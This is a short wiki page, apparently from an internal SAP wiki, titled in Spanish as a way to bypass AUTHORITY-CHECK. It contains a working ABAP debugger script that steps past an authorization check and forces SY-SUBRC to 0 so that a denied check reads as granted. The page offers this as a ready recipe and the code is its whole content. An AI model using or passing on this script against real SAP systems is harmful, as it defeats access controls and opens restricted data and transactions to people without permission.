SAP ABAP DEBUGGER SCRIPTING

From SapWiki
Revision as of 20:04, 13 June 2020 by WikiSysop (talk | contribs) (Created page with "==Bypasear los AUTHORITY-CHECK== <nowiki>METHOD script. *** insert your script code here TRY. debugger_controller->debug_step( p_command = cl_tpda_script_de...")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)

Bypasear los AUTHORITY-CHECK

 METHOD script.

*** insert your script code here
    TRY.
      debugger_controller->debug_step(
      p_command = cl_tpda_script_debugger_ctrl=>debug_step_over ).

      cl_tpda_script_data_descr=>change_value(
      p_new_value = '0'
      p_varname = 'SY-SUBRC' ).
    CATCH CX_TPDA_VARNAME .
    CATCH CX_TPDA_SCR_AUTH .
    ENDTRY.

  ENDMETHOD.                    "script